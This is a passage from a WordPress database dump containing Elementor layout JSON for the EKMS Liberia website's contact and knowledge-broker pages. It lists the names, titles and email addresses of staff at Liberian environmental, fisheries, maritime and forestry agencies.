8d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0080713\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"369beaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Albert M. Sherman <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:itssherman@gmail.com\\\">itssherman@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e5b0622\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Amos Borbor <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:felixborbor@gmail.com\\\">felixborbor@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58a8bc8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c7ec2c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry A. Simpson <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:ransford2024@gmail.com\\\">ransford2024@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c5ecaba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>James Kollie <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:jameskollie@yahoo.com\\\">jameskollie@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(24567,3627,'_elementor_edit_mode','builder'),(24568,3627,'_elementor_template_type','wp-page'),(24569,3627,'_elementor_version','3.0.16'),(24570,3627,'_wp_page_template','default'),(24571,3627,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a 